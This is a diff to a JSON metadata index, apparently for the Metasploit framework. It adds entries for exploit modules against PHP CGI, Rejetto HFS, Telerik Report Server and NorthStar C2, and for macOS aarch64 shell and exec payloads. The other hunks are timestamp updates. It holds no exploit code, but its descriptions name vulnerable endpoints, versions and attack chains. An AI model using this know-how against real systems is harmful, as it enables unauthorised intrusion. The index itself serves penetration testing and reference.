@@ -164418,6 +166312,69 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_windows/http/northstar_c2_xss_to_agent_rce": {
+    "name": "NorthStar C2 XSS to Agent RCE",
+    "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-12",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "chebuya"
+    ],
+    "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n          vulnerable to a stored xss.\n          An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n          With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n          (agents), and kill the original agent.\n\n          Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n          Ubuntu 22.04. The agent was running on Windows 10 19045.",
+    "references": [
+      "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/",
+      "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc",
+      "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c",
+      "CVE-2024-28741"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-04-24 16:54:58 +0000",
+    "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/northstar_c2_xss_to_agent_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_windows/http/novell_imanager_upload": {
     "name": "Novell iManager getMultiPartParameters Arbitrary File Upload",
     "fullname": "exploit/windows/http/novell_imanager_upload",
@@ -165243,6 +167200,69 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_windows/http/php_cgi_arg_injection_rce_cve_2024_4577": {
+    "name": "PHP CGI Argument Injection Remote Code Execution",
+    "fullname": "exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-06-06",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "watchTowr",
+      "sfewer-r7"
+    ],
+    "description": "This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations\n          on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that\n          the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)\n          character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose\n          the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),\n          and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.\n\n          XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target\n          an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.",
+    "references": [
+      "CVE-2024-4577",
+      "URL-https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/",
+      "URL-https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/"
+    ],
+    "platform": "PHP,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows PHP",
+      "Windows Command"
+    ],
+    "mod_time": "2024-06-13 15:10:14 +0000",
+    "path": "/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/php_cgi_arg_injection_rce_cve_2024_4577",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_windows/http/plesk_mylittleadmin_viewstate": {
     "name": "Plesk/myLittleAdmin ViewState .NET Deserialization",
     "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate",
@@ -165704,6 +167724,67 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_windows/http/rejetto_hfs_rce_cve_2024_23692": {
+    "name": "Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution",
+    "fullname": "exploit/windows/http/rejetto_hfs_rce_cve_2024_23692",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-25",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7",
+      "Arseniy Sharoglazov"
+    ],
+    "description": "The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template\n          injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges\n          of the user account running the HFS.exe server process. This exploit has been tested to work against version\n          2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers\n          and no patch is available. Users are recommended to upgrade to newer supported versions.",
+    "references": [
+      "CVE-2024-23692",
+      "URL-https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-06-11 16:26:04 +0000",
+    "path": "/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/rejetto_hfs_rce_cve_2024_23692",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_windows/http/sambar6_search_results": {
     "name": "Sambar 6 Search Results Buffer Overflow",
     "fullname": "exploit/windows/http/sambar6_search_results",
@@ -167234,6 +169315,73 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_windows/http/telerik_report_server_deserialization": {
+    "name": "Telerik Report Server Auth Bypass and Deserialization RCE",
+    "fullname": "exploit/windows/http/telerik_report_server_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-06-04",
+    "type": "exploit",
+    "author": [
+      "SinSinology",
+      "Soroush Dalili",
+      "Unknown",
+      "Spencer McIntyre"
+    ],
+    "description": "This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability\n          (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.\n          The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.\n          The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a\n          new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an\n          OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account\n          because users are unable to delete themselves.",
+    "references": [
+      "CVE-2024-1800",
+      "CVE-2024-4358",
+      "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 83,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-06-06 14:56:33 +0000",
+    "path": "/modules/exploits/windows/http/telerik_report_server_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/telerik_report_server_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/telerik_report_server_auth_bypass"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_windows/http/tomcat_cgi_cmdlineargs": {
     "name": "Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability",
     "fullname": "exploit/windows/http/tomcat_cgi_cmdlineargs",
@@ -182144,7 +184292,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2024-03-12 14:09:22 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/exploits/windows/mssql/mssql_payload.rb",
     "is_install_path": true,
     "ref_name": "windows/mssql/mssql_payload",
@@ -189774,7 +191922,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -189812,7 +191960,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -189850,7 +191998,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -189924,7 +192072,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -189962,7 +192110,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -190000,7 +192148,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -229179,7 +231327,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -229217,7 +231365,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -229255,7 +231403,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -229367,7 +231515,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -229405,7 +231553,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -229443,7 +231591,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -229668,7 +231816,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -229706,7 +231854,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -229744,7 +231892,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -229932,7 +232080,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -229970,7 +232118,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -230008,7 +232156,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -230045,7 +232193,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-05-21 12:52:12 +0000",
     "path": "/modules/payloads/singles/linux/mipsbe/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsbe/exec",
@@ -230123,7 +232271,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -230161,7 +232309,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -230199,7 +232347,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -230388,7 +232536,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-05-21 12:52:12 +0000",
     "path": "/modules/payloads/singles/linux/mipsle/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsle/exec",
@@ -230466,7 +232614,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -230504,7 +232652,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -230542,7 +232690,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -230732,7 +232880,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -230770,7 +232918,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -230808,7 +232956,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -231062,7 +233210,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -231100,7 +233248,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -231138,7 +233286,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -231176,7 +233324,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -231214,7 +233362,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -231252,7 +233400,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -231445,7 +233593,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -231483,7 +233631,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -231521,7 +233669,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -232475,7 +234623,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -232513,7 +234661,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -232551,7 +234699,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -233345,7 +235493,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -233383,7 +235531,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -233421,7 +235569,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:21:07 +0000",
     "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -233695,6 +235843,42 @@
     "payload_type": 1,
     "staged": false
   },
+  "payload_osx/aarch64/exec": {
+    "name": "OSX aarch64 Execute Command",
+    "fullname": "payload/osx/aarch64/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Execute an arbitrary command",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-12-30 16:26:31 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/exec.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
   "payload_osx/aarch64/meterpreter/reverse_tcp": {
     "name": "OSX Meterpreter, Reverse TCP Stager",
     "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp",
@@ -233762,7 +235946,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:33:30 +0000",
     "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
     "is_install_path": true,
     "ref_name": "osx/aarch64/meterpreter_reverse_http",
@@ -233801,7 +235985,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:33:30 +0000",
     "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
     "is_install_path": true,
     "ref_name": "osx/aarch64/meterpreter_reverse_https",
@@ -233840,7 +236024,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-06-24 05:33:30 +0000",
     "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "osx/aarch64/meterpreter_reverse_tcp",
@@ -233854,6 +236038,78 @@
     "payload_type": 1,
     "staged": false
   },
+  "payload_osx/aarch64/shell_bind_tcp": {
+    "name": "OS X x64 Shell Bind TCP",
+    "fullname": "payload/osx/aarch64/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Bind an arbitrary command to an arbitrary port",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-02-01 01:05:40 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/shell_reverse_tcp": {
+    "name": "OSX aarch64 Shell Reverse TCP",
+    "fullname": "payload/osx/aarch64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Connect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-02 14:13:07 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
